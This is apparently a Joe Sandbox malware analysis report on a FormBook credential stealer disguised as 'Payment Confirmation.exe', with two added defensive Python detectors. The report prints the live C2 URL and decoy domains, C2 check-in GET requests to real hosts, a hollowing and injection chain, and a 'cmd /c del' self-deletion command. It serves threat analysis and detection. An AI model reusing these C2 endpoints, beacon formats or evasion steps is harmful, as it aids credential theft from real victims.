Windows Analysis Report: Payment Confirmation.exe

Overview

General Information

Sample Name: Payment Confirmation.exe
Analysis ID: 502129
MD5: 98ffc3c812e6cec919ebd286973e2002
SHA1: b0d1a65445a7923870ad23ec4d80f592e808c987
SHA256: 014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Payment Confirmation.exe (PID: 2244 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
    • Payment Confirmation.exe (PID: 5440 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 1516 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 4852 cmdline: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
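
The tree above is the chain Joe Sandbox attributes to the sample: a second instance of the executable (PID 5440, consistent with the process-hollowing and suspended-process signatures listed above), explorer.exe carrying the injected code, a SysWOW64 msiexec.exe started with no arguments, and finally cmd.exe deleting the original file. The Python below is an added example, not Joe Sandbox code: it rebuilds that tree from process-creation records and flags the three stages. The records are constructed from the PIDs, paths and command lines in the tree; the image path of cmd.exe is not given there and is assumed to be C:\Windows\SysWOW64\cmd.exe, and the nesting of explorer.exe under PID 5440 is used as a parent link because that is how the report draws it. The heuristics and thresholds are this example's own.

```python
"""Flag the execution chain shown in the report's process tree.

Added example; the detection logic is this example's own, not Joe Sandbox's.
The events are constructed from the report's tree (PIDs, paths, command lines).
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]   # None for the root of the captured tree
    image: str            # full image path
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\Payment Confirmation.exe"

# Constructed from the report's process tree. The cmd.exe image path is assumed
# (the tree lists only its command line); explorer.exe is nested under PID 5440
# in the report because the injected code runs there, and that nesting is used
# as the parent link here.
EVENTS: List[ProcEvent] = [
    ProcEvent(2244, None, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(5440, 2244, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(3440, 5440, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(1516, 3440, r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\msiexec.exe"),
    ProcEvent(4852, 1516, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),
    ProcEvent(3800, 4852, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# "del", optional switches, then an optionally quoted path. The report renders
# the argument in single quotes, so both quote styles are stripped.
DEL_RE = re.compile(r"""\bdel\s+(?:/\w+\s+)*['"]?(?P<target>[^'"]+?)['"]?\s*$""", re.IGNORECASE)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _ancestors(by_pid: Dict[int, ProcEvent], pid: int) -> Iterator[ProcEvent]:
    """Walk parent links upward, guarding against PID-reuse cycles."""
    seen = {pid}
    ppid = by_pid[pid].ppid
    while ppid is not None and ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        yield by_pid[ppid]
        ppid = by_pid[ppid].ppid


def find_chain(events: List[ProcEvent]) -> List[Tuple[str, int, int]]:
    """Return (stage, pid, related_pid) for each stage of the chain found."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[str, int, int]] = []
    for e in events:
        parent = by_pid.get(e.ppid) if e.ppid is not None else None

        # Stage 1: the sample starts a second copy of its own image. Weak on
        # its own; with "Creates a process in suspended mode" it is the
        # classic hollowing setup.
        if parent is not None and parent.image.lower() == e.image.lower():
            findings.append(("self_relaunch", e.pid, parent.pid))

        # Stage 2: explorer.exe "starts" a SysWOW64 msiexec.exe with no
        # arguments, and that msiexec.exe goes on to spawn a shell.
        if (_name(e.image) == "msiexec.exe" and parent is not None
                and _name(parent.image) == "explorer.exe"
                and e.cmdline.strip().lower() == e.image.lower()
                and any(c.ppid == e.pid and _name(c.image) == "cmd.exe" for c in events)):
            findings.append(("explorer_msiexec_shell", e.pid, parent.pid))

        # Stage 3: cmd /c del <path> where <path> is the image of an ancestor,
        # i.e. the payload deleting the dropper that launched it.
        if _name(e.image) == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m:
                target = m.group("target").strip().lower()
                for anc in _ancestors(by_pid, e.pid):
                    if anc.image.lower() == target:
                        findings.append(("self_delete", e.pid, anc.pid))
                        break
    return findings


if __name__ == "__main__":
    for stage, pid, related in find_chain(EVENTS):
        print(f"{stage:<24} pid={pid} related_pid={related}")
```

The self-deletion check is the most specific of the three because it ties the deleted path back to an ancestor's image rather than matching on "del" alone; on real telemetry the parent link for the explorer.exe stage would come from the injection event, not from process creation.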

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x6ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x6bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x6af8:$sqlite3text: 68 38 2A 90 C5
  • 0x6c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(table truncated in this extract; 25 entries in total)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.1.Payment Confirmation.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.1.Payment Confirmation.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.1.Payment Confirmation.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
4.2.Payment Confirmation.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.Payment Confirmation.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(table truncated in this extract; 13 entries in total)
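
The tables above list, per rule, the byte strings that hit and the offset of every hit. The Python below is an added example, not Joe Sandbox code and not the rules themselves: it runs the same kind of string scan over a constructed buffer in which the report's patterns are planted at the offsets listed for 4.1.Payment Confirmation.exe.400000.0.raw.unpack, then evaluates an "all of them" condition. That condition is an assumption, because the report shows the strings of each rule but not its condition. Two details worth knowing when reading the tables: each JPCERT string is a `push imm32` (opcode 68) of one 32-bit constant, and the names the author gave them say the constants stand for sqlite3_step, sqlite3_column_text and sqlite3_column_blob, the calls a credential stealer makes against browser databases; the yara-signator `$sequence_0` (03 C8 0F 31 2B C1 89 45 FC) decodes to `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, the RDTSC timing check listed under Signatures.

```python
"""Scan a memory dump for the byte strings the report's Yara rules matched.

Added example, not Joe Sandbox code and not the rules themselves. Patterns and
offsets are copied from the report's Unpacked PEs table; the buffer is
constructed; the 'all of them' condition is assumed (the report does not show
rule conditions).
"""
from typing import Dict, List

# Hex strings exactly as listed in the Yara Overview tables above.
RULES: Dict[str, Dict[str, bytes]] = {
    # JPCERT/CC "Formbook": three push imm32 (opcode 68) of one constant each.
    "Formbook": {
        "$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
        "$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
        "$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
    },
    # yara-signator $sequence_0: add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    # (the RDTSC timing check listed under Signatures).
    "Formbook_1_rdtsc": {
        "$sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
    },
}

# Offsets reported for 4.1.Payment Confirmation.exe.400000.0.raw.unpack.
REPORTED: Dict[str, List[int]] = {
    "$sequence_0": [0x8618, 0x89B2],
    "$sqlite3step": [0x16AC9, 0x16BDC],
    "$sqlite3text": [0x16AF8, 0x16C1D],
    "$sqlite3blob": [0x16B0B, 0x16C33],
}


def build_dump(size: int = 0x20000) -> bytes:
    """Constructed stand-in for the unpacked image: filler with the report's
    strings planted at the reported offsets, plus one truncated $sqlite3blob
    (4 of its 5 bytes) at 0x1000 that must not count as a hit."""
    buf = bytearray(b"\xCC" * size)
    patterns = {n: p for strings in RULES.values() for n, p in strings.items()}
    for name, offsets in REPORTED.items():
        for off in offsets:
            buf[off:off + len(patterns[name])] = patterns[name]
    buf[0x1000:0x1004] = patterns["$sqlite3blob"][:4]
    return bytes(buf)


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every (possibly overlapping) offset of needle in buf."""
    hits, i = [], buf.find(needle)
    while i != -1:
        hits.append(i)
        i = buf.find(needle, i + 1)
    return hits


def scan(buf: bytes, rules: Dict[str, Dict[str, bytes]]) -> Dict[str, Dict[str, List[int]]]:
    """Per rule, per string, the offsets of all hits (Yara's string stage)."""
    return {rule: {name: find_all(buf, pat) for name, pat in strings.items()}
            for rule, strings in rules.items()}


def matching_rules(hits: Dict[str, Dict[str, List[int]]]) -> List[str]:
    """Assumed 'all of them' condition: every string of the rule hit at least once."""
    return [rule for rule, strings in hits.items() if all(strings.values())]


if __name__ == "__main__":
    dump = build_dump()
    result = scan(dump, RULES)
    for rule, strings in result.items():
        for name, offs in strings.items():
            print(rule, name, [hex(o) for o in offs])
    print("matched:", matching_rules(result))
```

Scanning only the first 0x10000 bytes of the constructed buffer still matches the RDTSC rule but not the JPCERT one, which is the situation the Memory Dumps table shows for the 0DD52000 region: it carries the yara-signator sequences without `$sequence_0` and the sqlite strings at offsets exactly 0x10000 lower than in the unpacked PE.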

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Payment Confirmation.exe | Virustotal: Detection: 24%
Source: Payment Confirmation.exe | ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: www.thesewhitevvalls.com | Virustotal: Detection: 6%
Machine Learning detection for sample
Source: Payment Confirmation.exe | Joe Sandbox ML: detected
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.msiexec.exe.49f796c.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.Payment Confirmation.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.1.Payment Confirmation.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Payment Confirmation.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: msiexec.pdb | source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: msiexec.pdbGCTL | source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Payment Confirmation.exe, msiexec.exe
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_00402671 FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 52.206.159.80 80
Source: C:\Windows\explorer.exe | Network Connect: 45.91.80.182 80
Source: C:\Windows\explorer.exe | Domain query: www.thesewhitevvalls.com
Source: C:\Windows\explorer.exe | Domain query: www.lumberjackguitarloops.com
Source: C:\Windows\explorer.exe | Domain query: www.elliotpioneer.com
Source: C:\Windows\explorer.exe | Domain query: www.carts-amazon.com
Source: C:\Windows\explorer.exe | Domain query: www.chinaopedia.com
Source: C:\Windows\explorer.exe | Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe | Domain query: www.anadolu.academy
Source: C:\Windows\explorer.exe | Domain query: www.playstarexch.com
Source: C:\Windows\explorer.exe | Network Connect: 172.105.103.207 80
Source: C:\Windows\explorer.exe | Network Connect: 62.210.5.81 80
Source: C:\Windows\explorer.exe | Domain query: www.altitudebc.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 94.73.147.156 80
Source: C:\Windows\explorer.exe | Domain query: www.unasolucioendesa.com
Source: C:\Windows\explorer.exe | Domain query: www.atp-cayenne.com
Source: C:\Windows\explorer.exe | Network Connect: 82.98.134.154 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.thesewhitevvalls.com/b2c0/
Source: Joe Sandbox View | ASN Name: ASIANETGB ASIANETGB
Source: global traffic | HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1 | Host: www.playstarexch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1 | Host: www.anadolu.academy | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1 | Host: www.altitudebc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1 | Host: www.unasolucioendesa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1 | Host: www.elliotpioneer.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1 | Host: www.thesewhitevvalls.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1 | Host: www.lumberjackguitarloops.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1 | Host: www.carts-amazon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1 | Host: www.chinaopedia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic | HTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1 | Host: www.atp-cayenne.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: Joe Sandbox View | IP Address: 52.206.159.80 52.206.159.80
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 14:32:21 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f93b1-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
